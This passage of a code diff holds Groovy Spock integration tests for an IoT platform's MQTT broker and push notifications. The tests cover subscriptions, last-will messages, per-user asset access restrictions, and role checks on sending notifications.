+      assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 1
+    }
+
+    when: "a client disconnects"
+    client.disconnect()
+
+    then: "the client status should be disconnected"
+    conditions.eventually {
+      assert client.getConnectionStatus() == ConnectionStatus.DISCONNECTED
+      assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id).size() == 0
+    }
+
+    when: "the client reconnects"
+    receivedEvents.clear()
+    client.connect()
+
+    then: "the connection should exist and the previous subscription should be recreated"
+    conditions.eventually {
+      assert client.getConnectionStatus() == ConnectionStatus.CONNECTED
+      assert client.topicConsumerMap.size() == 1
+      def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 1
+    }
+
+    when: "a mqtt client subscribes to assets that are direct children of the realm"
+    topic = "${keycloakTestSetup.realmBuilding.name}/$mqttClientId/$DefaultMQTTHandler.ASSET_TOPIC/$MQTTHandler.TOKEN_SINGLE_LEVEL_WILDCARD".toString()
+    client.addMessageConsumer(topic, eventConsumer)
+
+    then: "A subscription should exist"
+    conditions.eventually {
+      def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 2
+    }
+
+    when: "an asset is updated with a new attribute"
+    def asset1 = assetStorageService.find(managerTestSetup.smartBuildingId)
+    asset1.addAttributes(new Attribute<>("temp", TEXT, "hello world"))
+    assetStorageService.merge(asset1)
+
+    then: "A publish event message should be sent"
+    conditions.eventually {
+      assert receivedEvents.size() == 1
+      assert receivedEvents.get(0) instanceof AssetEvent
+      assert (receivedEvents.get(0) as AssetEvent).id == managerTestSetup.smartBuildingId
+      assert (receivedEvents.get(0) as AssetEvent).asset.attributes.get("temp") != null
+      assert (receivedEvents.get(0) as AssetEvent).asset.attributes.get("temp").flatMap(){
+        it.getValue()
+      }.orElse(null) == "hello world"
+    }
+    receivedEvents.clear()
+
+    when: "the client subscribes to descendant assets of a specific asset"
+    topic = "${keycloakTestSetup.realmBuilding.name}/$mqttClientId/$DefaultMQTTHandler.ASSET_TOPIC/$managerTestSetup.apartment1Id/$MQTTHandler.TOKEN_MULTI_LEVEL_WILDCARD".toString()
+    client.addMessageConsumer(topic, eventConsumer)
+
+    then: "the subscription should exist"
+    conditions.eventually {
+      assert client.topicConsumerMap.get(topic) != null
+      def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 3
+    }
+
+    when: "an asset is added as a descendant to the subscribed asset"
+    def childAsset = new ThingAsset("child")
+            .setParentId(managerTestSetup.apartment1LivingroomId)
+            .setRealm(managerTestSetup.realmBuildingName)
+    childAsset = assetStorageService.merge(childAsset)
+
+    then: "another event should be sent"
+    conditions.eventually {
+      assert receivedEvents.size() == 1
+      assert receivedEvents.get(0) instanceof AssetEvent
+      assert (receivedEvents.get(0) as AssetEvent).id == childAsset.id
+      assert (receivedEvents.get(0) as AssetEvent).assetName == childAsset.name
+    }
+    receivedEvents.clear()
+
+    when: "the mqtt client unsubscribes from the multilevel topic"
+    client.removeMessageConsumer(topic, eventConsumer)
+
+    then: "only two subscriptions should be left"
+    conditions.eventually {
+      assert client.topicConsumerMap.get(topic) == null
+      def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 2
+    }
+
+    when: "the descendant asset is modified"
+    childAsset.addAttributes(new Attribute<>("temp2", TEXT))
+    childAsset = assetStorageService.merge(childAsset)
+
+    then: "A publish event message should not be sent"
+    new PollingConditions(initialDelay: 1, delay: 1, timeout: 10).eventually {
+      assert receivedEvents.size() == 0
+    }
+
+    when: "another client connects with a last will configured to write to an attribute"
+    newClientId = "newClient"
+    def username2 = keycloakTestSetup.realmBuilding.name + ":" + keycloakTestSetup.serviceUser2.username // realm and OAuth client id
+    def password2 = keycloakTestSetup.serviceUser2.secret
+    newClient = new MQTT_IOClient(newClientId, mqttHost, mqttPort, false, true, new UsernamePassword(username2, password2), null, new MQTTLastWill("${keycloakTestSetup.realmBuilding.name}/$newClientId/$DefaultMQTTHandler.ATTRIBUTE_VALUE_WRITE_TOPIC/motionSensor/$managerTestSetup.apartment1HallwayId".toString(), "1000", false))
+    newClient.connect()
+
+    then: "the client should be connected"
+    conditions.eventually {
+      assert newClient.getConnectionStatus() == ConnectionStatus.CONNECTED
+    }
+
+    when: "the new client publishes to an attribute topic"
+    receivedEvents.clear()
+    topic = "${keycloakTestSetup.realmBuilding.name}/$newClientId/$DefaultMQTTHandler.ATTRIBUTE_VALUE_WRITE_TOPIC/motionSensor/${managerTestSetup.apartment1HallwayId}".toString()
+    payload = "170"
+    newClient.sendMessage(new MQTTMessage<String>(topic, payload))
+
+    then: "The value of the attribute should be updated and the first client should have received the event"
+    new PollingConditions(initialDelay: 1, timeout: 10, delay: 1).eventually {
+      assert assetStorageService.find(managerTestSetup.apartment1HallwayId).getAttribute("motionSensor").get().value.orElse(0) == 170d
+      assert receivedEvents.size() == 1
+      assert receivedEvents.get(0) instanceof AttributeEvent
+      assert (receivedEvents.get(0) as AttributeEvent).id == managerTestSetup.apartment1HallwayId
+      assert (receivedEvents.get(0) as AttributeEvent).name == "motionSensor"
+      assert (receivedEvents.get(0) as AttributeEvent).value.orElse(0) == 170d
+    }
+    receivedEvents.clear()
+
+    and: "the new client gets abruptly disconnected"
+    widenDisconnectedConnectionWindow(mqttBrokerService)
+    def existingConnection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0]
+    //        ((NioSocketChannel)((MqttClientConnectionConfig)((MqttClientConfig)((Mqtt3ClientConfigView)((Mqtt3AsyncClientView)device1Client.client).clientConfig).delegate).connectionConfig.get()).channel).config().setOption(ChannelOption.SO_LINGER, 0I)
+    ((SocketChannel)((MqttClientConnectionConfig)((MqttClientConfig)((Mqtt3ClientConfigView)((Mqtt3AsyncClientView)newClient.client).clientConfig).delegate).connectionConfig.get()).channel).close()
+
+    then: "the client should reconnect"
+    conditions.eventually {
+      assert !mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id).isEmpty()
+      assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0] !== existingConnection
+    }
+
+    and: "The last will message should have updated the value of the attribute and the first client should have received the event"
+    // The client reconnecting does not mean the broker has processed the closed session yet, and publishing the
+    // last will of that session is what triggers the update, so allow well beyond the reconnect for it
+    new PollingConditions(initialDelay: 1, timeout: 30, delay: 1).eventually {
+      assert assetStorageService.find(managerTestSetup.apartment1HallwayId).getAttribute("motionSensor").get().value.orElse(0) == 1000d
+      assert receivedEvents.size() == 1
+      assert receivedEvents.get(0) instanceof AttributeEvent
+      assert (receivedEvents.get(0) as AttributeEvent).id == managerTestSetup.apartment1HallwayId
+      assert (receivedEvents.get(0) as AttributeEvent).name == "motionSensor"
+      assert (receivedEvents.get(0) as AttributeEvent).value.orElse(0) == 1000d
+    }
+
+    when: "the new client tries to publish again with a specified timestamp"
+    def specifiedTimestamp = (receivedEvents.get(0) as AttributeEvent).timestamp + 5
+    receivedEvents.clear()
+    topic = "${keycloakTestSetup.realmBuilding.name}/$newClientId/$DefaultMQTTHandler.ATTRIBUTE_WRITE_TOPIC/motionSensor/${managerTestSetup.apartment1HallwayId}".toString()
+    payload = "{\"value\": 170, \"timestamp\": ${specifiedTimestamp}}".toString()
+    newClient.sendMessage(new MQTTMessage<String>(topic, payload))
+
+    then: "The value of the attribute should be updated and the first client should have received the event"
+    new PollingConditions(initialDelay: 1, timeout: 10, delay: 1).eventually {
+      assert assetStorageService.find(managerTestSetup.apartment1HallwayId).getAttribute("motionSensor").get().value.orElse(0) == 170d
+      assert receivedEvents.size() == 1
+      assert receivedEvents.get(0) instanceof AttributeEvent
+      assert (receivedEvents.get(0) as AttributeEvent).id == managerTestSetup.apartment1HallwayId
+      assert (receivedEvents.get(0) as AttributeEvent).name == "motionSensor"
+      assert (receivedEvents.get(0) as AttributeEvent).value.orElse(0) == 170d
+      assert (receivedEvents.get(0) as AttributeEvent).timestamp == specifiedTimestamp
+    }
+    receivedEvents.clear()
+
+    when: "the new client disconnects"
+    newClient.disconnect()
+
+    then: "the status should show as disconnected"
+    conditions.eventually {
+      assert newClient.getConnectionStatus() == ConnectionStatus.DISCONNECTED
+      assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id).isEmpty()
+    }
+
+    when: "the new client reconnects using a last will topic for an unauthorised asset/attribute"
+    def asset = assetStorageService.find(managerTestSetup.apartment2LivingroomId)
+    def currentCO2Level = asset.getAttribute("co2Level").flatMap{it.getValue()}.orElse(0d)
+    newClient = new MQTT_IOClient(newClientId, mqttHost, mqttPort, false, true, new UsernamePassword(username2, password2), null, new MQTTLastWill("${keycloakTestSetup.realmBuilding.name}/$mqttClientId/$DefaultMQTTHandler.ATTRIBUTE_VALUE_WRITE_TOPIC/co2Level/$managerTestSetup.apartment2LivingroomId".toString(), "1000", false))
+    newClient.setTopicSubscribeFailureConsumer {subFailures.add(it)}
+    newClient.connect()
+
+    then: "the client should be connected"
+    conditions.eventually {
+      assert newClient.getConnectionStatus() == ConnectionStatus.CONNECTED
+      assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id).size() == 1
+    }
+
+    when: "the new client gets abruptly disconnected"
+    existingConnection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0]
+    //        ((NioSocketChannel)((MqttClientConnectionConfig)((MqttClientConfig)((Mqtt3ClientConfigView)((Mqtt3AsyncClientView)device1Client.client).clientConfig).delegate).connectionConfig.get()).channel).config().setOption(ChannelOption.SO_LINGER, 0I)
+    ((SocketChannel)((MqttClientConnectionConfig)((MqttClientConfig)((Mqtt3ClientConfigView)((Mqtt3AsyncClientView)newClient.client).clientConfig).delegate).connectionConfig.get()).channel).close()
+
+    then: "the client should reconnect"
+    conditions.eventually {
+      assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id).size() == 1
+      assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0] !== existingConnection
+    }
+
+    then: "The last will message should not have updated the value of the attribute"
+    new PollingConditions(initialDelay: 1, timeout: 10, delay: 1).eventually {
+      def asst = assetStorageService.find(managerTestSetup.apartment2LivingroomId)
+      assert asst.getAttribute("co2Level").get().value.orElse(-100) == currentCO2Level
+    }
+
+    when: "a restricted mqtt client subscribes to an unlinked asset"
+    topic = "${keycloakTestSetup.realmBuilding.name}/$newClientId/$DefaultMQTTHandler.ATTRIBUTE_TOPIC/$MQTTHandler.TOKEN_SINGLE_LEVEL_WILDCARD/$managerTestSetup.apartment1BathroomId".toString()
+    newClient.addMessageConsumer(topic, {msg ->})
+
+    then: "the subscription should fail but the consumer should still exist (as setRemoveConsumersOnSubscriptionFailure=false)"
+    conditions.eventually {
+      assert subFailures.contains(topic)
+      assert newClient.topicConsumerMap.get(topic) != null
+      assert newClient.topicConsumerMap.get(topic).consumers.size() == 1
+      def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0]
+      assert !defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
+    }
+
+    when: "a restricted mqtt client subscribes to a linked asset"
+    topic = "${keycloakTestSetup.realmBuilding.name}/$newClientId/$DefaultMQTTHandler.ATTRIBUTE_TOPIC/$MQTTHandler.TOKEN_SINGLE_LEVEL_WILDCARD/$managerTestSetup.apartment1HallwayId".toString()
+    newClient.addMessageConsumer(topic, {msg ->})
+
+    then: "a subscription should exist"
+    conditions.eventually {
+      assert newClient.topicConsumerMap.get(topic) != null
+      assert newClient.topicConsumerMap.get(topic).consumers.size() == 1
+      def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0]
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 1
+    }
+
+    when: "a user asset link is added for a connected restricted user"
+    existingConnection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0]
+    assetStorageService.storeUserAssetLinks(List.of(
+                    new UserAssetLink(keycloakTestSetup.realmBuilding.getName(),
+                    keycloakTestSetup.serviceUser2.getId(),
+                    managerTestSetup.apartment1BathroomId)))
+
+    then: "the existing connection should be terminated and the client should reconnect and the previously failed subscription should now succeed"
+    conditions.eventually {
+      assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id).size() == 1
+      assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0] !== existingConnection
+      def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0]
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
+    }
+
+    when: "a user asset link is removed for a connected restricted user"
+    existingConnection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0]
+    assetStorageService.deleteUserAssetLinks(List.of(
+                    new UserAssetLink(keycloakTestSetup.realmBuilding.getName(),
+                    keycloakTestSetup.serviceUser2.getId(),
+                    managerTestSetup.apartment1HallwayId)))
+
+    then: "the existing connection should be terminated and the client should reconnect and the previously failed subscription should be tried again but also fail"
+    conditions.eventually {
+      assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id).size() == 1
+      assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0] !== existingConnection
+    }
+
+    when: "the restricted mqtt client removes all subscriptions"
+    newClient.removeAllMessageConsumers() // Clear subscriptions as otherwise it won't hit the server again
+
+    then: "no subscriptions should exist in the client"
+    assert newClient.topicConsumerMap.isEmpty()
+
+    Consumer<MQTTMessage<String>> restrictedEventConsumer = { msg ->
+      def event = ValueUtil.parse(msg.payload as String, SharedEvent.class)
+      restrictedReceivedEvents.add(event.get())
+    }
+
+    when: "the restricted mqtt client subscribes to a now unlinked asset"
+    topic = "${keycloakTestSetup.realmBuilding.name}/$newClientId/$DefaultMQTTHandler.ATTRIBUTE_TOPIC/$MQTTHandler.TOKEN_SINGLE_LEVEL_WILDCARD/$managerTestSetup.apartment1HallwayId".toString()
+    newClient.addMessageConsumer(topic, restrictedEventConsumer)
+
+    then: "no subscription should exist"
+    conditions.eventually {
+      assert subFailures.contains(topic)
+      def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0]
+      assert !defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
+    }
+
+    when: "the previously failed message consumer is removed"
+    newClient.removeMessageConsumer(topic, restrictedEventConsumer)
+
+    and: "a restricted mqtt client subscribes to the attribute wildcard topic"
+    topic = "${keycloakTestSetup.realmBuilding.name}/$newClientId/$DefaultMQTTHandler.ATTRIBUTE_TOPIC/$MQTTHandler.TOKEN_SINGLE_LEVEL_WILDCARD/$MQTTHandler.TOKEN_MULTI_LEVEL_WILDCARD".toString()
+    newClient.addMessageConsumer(topic, restrictedEventConsumer)
+
+    then: "a subscription should exist"
+    conditions.eventually {
+      assert newClient.topicConsumerMap.get(topic) != null
+      def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0]
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
+    }
+
+    when: "an unlinked asset attribute event occurs"
+    attributeEvent = new AttributeEvent(managerTestSetup.apartment1HallwayId, "motionSensor", 40)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
+
+    then: "the restricted client should not receive the event"
+    conditions.eventually {
+      assert restrictedReceivedEvents.size() == 0
+    }
+
+    when: "a linked asset attribute event occurs"
+    attributeEvent = new AttributeEvent(managerTestSetup.apartment1BathroomId, RoomAsset.ROOM_NUMBER, 1)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
+
+    then: "the restricted client should not receive the event since the attribute is not restricted"
+    conditions.eventually {
+      assert restrictedReceivedEvents.size() == 0
+    }
+
+    when: "a linked asset attribute has its restricted meta configuration set to true"
+    def bathroomAsset = assetStorageService.find(managerTestSetup.apartment1BathroomId)
+    bathroomAsset.getAttributes().get(RoomAsset.ROOM_NUMBER).get().addOrReplaceMeta(new MetaItem<>(ACCESS_RESTRICTED_READ, true))
+    assetStorageService.merge(bathroomAsset)
+
+    then: "the restricted client should still be connected"
+    conditions.eventually {
+      assert newClient.getConnectionStatus() == ConnectionStatus.CONNECTED
+      assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id).size() == 1
+    }
+
+    then: "the restricted client should receive the triggered attribute event"
+    conditions.eventually {
+      assert restrictedReceivedEvents.size() == 1
+    }
+    restrictedReceivedEvents.clear()
+
+    when: "another attribute event occurs on the restricted read attribute"
+    attributeEvent = new AttributeEvent(managerTestSetup.apartment1BathroomId, RoomAsset.ROOM_NUMBER, 2)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
+
+    then: "the restricted client should receive the triggered attribute event"
+    conditions.eventually {
+      assert restrictedReceivedEvents.size() == 1
+      assert restrictedReceivedEvents.get(0) == attributeEvent
+    }
+    restrictedReceivedEvents.clear()
+
+    when: "the restricted read meta item is removed"
+    bathroomAsset = assetStorageService.find(managerTestSetup.apartment1BathroomId)
+    bathroomAsset.getAttributes().addOrReplace(new Attribute<>(RoomAsset.ROOM_NUMBER, 2))
+    assetStorageService.merge(bathroomAsset)
+
+    then: "the restricted client should not receive the triggered attribute event"
+    conditions.eventually {
+      assert restrictedReceivedEvents.size() == 0
+    }
+    newClient.removeAllMessageConsumers()
+    restrictedReceivedEvents.clear()
+
+    when: "a restricted mqtt client subscribes to the asset wildcard topic"
+    topic = "${keycloakTestSetup.realmBuilding.name}/$newClientId/$DefaultMQTTHandler.ASSET_TOPIC/$MQTTHandler.TOKEN_MULTI_LEVEL_WILDCARD".toString()
+    newClient.addMessageConsumer(topic, restrictedEventConsumer)
+
+    then: "a subscription should exist"
+    conditions.eventually {
+      assert newClient.topicConsumerMap.get(topic) != null
+    }
+
+    when: "a linked asset event occurs"
+    bathroomAsset = assetStorageService.find(managerTestSetup.apartment1BathroomId)
+    bathroomAsset.getAttributes().get(RoomAsset.ROOM_NUMBER).get().setValue(2)
+    assetStorageService.merge(bathroomAsset)
+
+    then: "the restricted client should receive the triggered asset event"
+    conditions.eventually {
+      assert restrictedReceivedEvents.size() == 1
+    }
+
+    and: "the event should only contain attributes that are read restricted"
+    conditions.eventually {
+      assert restrictedReceivedEvents.size() == 1
+      def event = restrictedReceivedEvents.get(0)
+      assert event instanceof AssetEvent
+      def assetEvent = event as AssetEvent
+      assert !assetEvent.getAsset().hasAttribute(RoomAsset.ROOM_NUMBER)
+    }
+    restrictedReceivedEvents.clear()
+
+    when: "the restricted read meta item is added again"
+    bathroomAsset = assetStorageService.find(managerTestSetup.apartment1BathroomId)
+    bathroomAsset.getAttributes().get(RoomAsset.ROOM_NUMBER).get().addOrReplaceMeta(new MetaItem<>(ACCESS_RESTRICTED_READ, true))
+    assetStorageService.merge(bathroomAsset)
+
+    then: "the restricted client should receive the triggered asset event"
+    conditions.eventually {
+      assert restrictedReceivedEvents.size() == 1
+      def event = restrictedReceivedEvents.get(0)
+      assert event instanceof AssetEvent
+      def assetEvent = event as AssetEvent
+      assert assetEvent.getAsset().getAttribute(RoomAsset.ROOM_NUMBER).isPresent()
+      assert assetEvent.getAsset().getAttribute(RoomAsset.ROOM_NUMBER).get().getValue().orElse(null) == 2
+    }
+    restrictedReceivedEvents.clear()
+
+    when: "the asset is unlinked"
+    assetStorageService.deleteUserAssetLinks(List.of(
+                    new UserAssetLink(keycloakTestSetup.realmBuilding.getName(),
+                    keycloakTestSetup.serviceUser2.getId(),
+                    managerTestSetup.apartment1BathroomId)))
+
+
+    then: "the existing connection should be terminated and the client should reconnect"
+    conditions.eventually {
+      assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id).size() == 1
+      assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0] !== existingConnection
+    }
+
+    when: "the restricted mqtt client removes all subscriptions"
+    newClient.removeAllMessageConsumers() // Clear subscriptions as otherwise it won't hit the server again
+
+    then: "no subscriptions should exist in the client"
+    assert newClient.topicConsumerMap.isEmpty()
+
+    when: "the restricted mqtt client subscribes to the asset wildcard topic again"
+    topic = "${keycloakTestSetup.realmBuilding.name}/$newClientId/$DefaultMQTTHandler.ASSET_TOPIC/$MQTTHandler.TOKEN_MULTI_LEVEL_WILDCARD".toString()
+    newClient.addMessageConsumer(topic, restrictedEventConsumer)
+
+    then: "a subscription should exist"
+    conditions.eventually {
+      assert newClient.topicConsumerMap.get(topic) != null
+    }
+
+    when: "an asset event occurs on the now unlinked asset"
+    bathroomAsset = assetStorageService.find(managerTestSetup.apartment1BathroomId)
+    bathroomAsset.getAttributes().get(RoomAsset.ROOM_NUMBER).get().setValue(2)
+    assetStorageService.merge(bathroomAsset)
+
+    then: "the restricted client should not receive the triggered asset event"
+    conditions.eventually {
+      assert restrictedReceivedEvents.size() == 0
+    }
+    restrictedReceivedEvents.clear()
+    newClient.removeAllMessageConsumers()
+
+    when: "both MQTT clients disconnect"
+    client.disconnect()
+    newClient.disconnect()
+
+    then: "no connections should be left"
+    conditions.eventually {
+      assert client.getConnectionStatus() == ConnectionStatus.DISCONNECTED
+      assert newClient.getConnectionStatus() == ConnectionStatus.DISCONNECTED
+      assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id).isEmpty()
+      assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id).isEmpty()
+    }
+
+    cleanup: "disconnect the clients"
+    if (client != null) {
+      client.disconnect()
+    }
+    if (newClient != null) {
+      newClient.disconnect()
+    }
+  }
+
+  /**
+   * A last will publish is only accepted while the broker can still resolve the closed connection, which it keeps for
+   * 3s, so a publish consumer that is held up for longer drops the will and no amount of polling recovers it.
+   */
+  private static void widenDisconnectedConnectionWindow(MQTTBrokerService mqttBrokerService) {
+    mqttBrokerService.@disconnectedConnectionCache = CacheBuilder.newBuilder()
+            .maximumSize(10000)
+            .expireAfterWrite(Duration.ofSeconds(60))
+            .build()
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/notification/NotificationTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/notification/NotificationTest.groovy
@@ -62,1274 +62,1340 @@ import static org.openremote.model.util.ValueUtil.parse
 
 class NotificationTest extends Specification implements ManagerContainerTrait {
 
-    def "Check push notification functionality"() {
-
-        List<String> notificationIds = new CopyOnWriteArrayList<>()
-        List<Notification.TargetType> notificationTargetTypes = new CopyOnWriteArrayList<>()
-        List<String> notificationTargetIds = new CopyOnWriteArrayList<>()
-        List<AbstractNotificationMessage> notificationMessages = new CopyOnWriteArrayList<>()
-
-        given: "the container environment is started with the mock handler"
-        def conditions = new PollingConditions(timeout: 10, initialDelay: 0.1, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def notificationService = container.getService(NotificationService.class)
-        def pushNotificationHandler = container.getService(PushNotificationHandler.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def consoleResource = (ConsoleResourceImpl)container.getService(ManagerWebService.class).apiSingletons.find {it instanceof ConsoleResourceImpl}
-
-        and: "a mock push notification handler"
-        def throwPushHandlerException = false
-        PushNotificationHandler mockPushNotificationHandler = Spy(pushNotificationHandler)
-        mockPushNotificationHandler.isValid() >> true
-        mockPushNotificationHandler.sendMessage(_ as Long, _ as Notification.Source, _ as String, _ as Notification.Target, _ as AbstractNotificationMessage) >> {
-            id, source, sourceId, target, message ->
-                if (throwPushHandlerException) {
-                    throw new Exception("Failed to send notification")
-                }
-                notificationIds << id
-                notificationTargetTypes << target.type
-                notificationTargetIds << target.id
-                notificationMessages << message
-                callRealMethod()
-        }
-        // Assume sent to FCM
-        mockPushNotificationHandler.sendMessage(_ as com.google.firebase.messaging.Message) >> {
-            message -> return NotificationSendResult.success()
-        }
-
-        notificationService.notificationHandlerMap.put(pushNotificationHandler.getTypeName(), mockPushNotificationHandler)
-
-        and: "an authenticated test user"
-        def realm = keycloakTestSetup.realmBuilding.name
-        def testuser1AccessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                "testuser1",
-                "testuser1"
-        )
-        def testuser2AccessToken = authenticate(
-                container,
-                realm,
-                KEYCLOAK_CLIENT_ID,
-                "testuser2",
-                "testuser2"
-        )
-        def testuser3AccessToken = authenticate(
-                container,
-                realm,
-                KEYCLOAK_CLIENT_ID,
-                "testuser3",
-                "testuser3"
-        )
-
-        and: "an authenticated superuser"
-        def adminAccessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                MASTER_REALM_ADMIN_USER,
-                getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
-
-        def notification = new Notification("TestAction",
-                new PushNotificationMessage("Test Action",
-                        "Click to cancel",
-                        writeAttributeValueAction(
-                                new AttributeRef(
-                                        managerTestSetup.apartment1LivingroomId,
-                                        "alarmEnabled"
-                                ),
-                                false), null, null), null, null, null)
-
-        and: "the notification resource"
-        def testuser1NotificationResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, testuser1AccessToken).proxy(NotificationResource.class)
-        def testuser2NotificationResource = getClientApiTarget(serverUri(serverPort), realm, testuser2AccessToken).proxy(NotificationResource.class)
-        def testuser3NotificationResource = getClientApiTarget(serverUri(serverPort), realm, testuser3AccessToken).proxy(NotificationResource.class)
-        def adminNotificationResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, adminAccessToken).proxy(NotificationResource.class)
-        def anonymousNotificationResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name).proxy(NotificationResource.class)
-        def testuser1ConsoleResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, testuser1AccessToken).proxy(ConsoleResource.class)
-        def testuser2ConsoleResource = getClientApiTarget(serverUri(serverPort), realm, testuser2AccessToken).proxy(ConsoleResource.class)
-        def testuser3ConsoleResource = getClientApiTarget(serverUri(serverPort), realm, testuser3AccessToken).proxy(ConsoleResource.class)
-        def adminConsoleResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, adminAccessToken).proxy(ConsoleResource.class)
-        def anonymousConsoleResource = getClientApiTarget(serverUri(serverPort), realm).proxy(ConsoleResource.class)
-        SentNotification[] notifications = new CopyOnWriteArrayList<>()
-
-        when: "various consoles are registered"
-        def consoleRegistration = new ConsoleRegistration(null,
-                "Test Console",
-                "1.0",
-                "Android 7.0",
-                new HashMap<String, ConsoleProvider>(
-                        geofence: new ConsoleProvider(
-                                ORConsoleGeofenceAssetAdapter.NAME,
-                                true,
-                                false,
-                                false,
-                                false,
-                                false,
-                                null
-                        ),
-                        push: new ConsoleProvider(
-                                "fcm",
-                                true,
-                                true,
-                                true,
-                                true,
-                                false,
-                                (Map) parse("{\"token\": \"23123213ad2313b0897efd\"}").orElse(null)
-                        )
-                ),
-                "",
-                ["manager"] as String[])
-        def testuser2Console = testuser2ConsoleResource.register(null, consoleRegistration)
-        def testuser3Console1 = testuser3ConsoleResource.register(null, consoleRegistration)
-        def testuser3Console2 = testuser3ConsoleResource.register(null, consoleRegistration)
-        def adminConsole = adminConsoleResource.register(null, consoleRegistration)
-        def anonymousConsole = anonymousConsoleResource.register(null, consoleRegistration)
-
-        then: "the consoles should have been created"
-        testuser2Console.id != null
-        testuser3Console1.id != null
-        testuser3Console2.id != null
-        adminConsole.id != null
-        anonymousConsole.id != null
-
-        when: "the admin user sends a push notification to an entire realm"
-        notification.targets = [new Notification.Target(Notification.TargetType.REALM, keycloakTestSetup.realmBuilding.name)]
-        adminNotificationResource.sendNotification(null, notification)
-
-        then: "all consoles in that realm should have been sent a notification (excluding testuser2 as they have disabled push notifications)"
-        conditions.eventually {
-            assert notificationIds.size() == 3
-            assert notificationTargetTypes.count { t -> t == Notification.TargetType.ASSET } == 3
-            assert !notificationTargetIds.contains(testuser2Console.id)
-            assert notificationTargetIds.contains(testuser3Console1.id)
-            assert notificationTargetIds.contains(testuser3Console2.id)
-            assert notificationTargetIds.contains(anonymousConsole.id)
-            assert notificationMessages.count { m -> m instanceof PushNotificationMessage && m.title == "Test Action" && m.body == "Click to cancel" && m.action != null } == 3
-        }
-
-        when: "a regular user without write:notifications sends a push notification to an entire realm"
-        testuser2NotificationResource.sendNotification(null, notification)
-
-        then: "the request should be forbidden (no write:notifications role)"
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "the admin user sends a notification to a user in a different realm with emailNotificationsDisabled set to true"
-        notification.targets = [new Notification.Target(Notification.TargetType.USER, keycloakTestSetup.testuser2Id)]
-        advancePseudoClock(1, TimeUnit.HOURS, container)
-        adminNotificationResource.sendNotification(null, notification)
-
-        then: "no notification should have been sent"
-        ex = thrown()
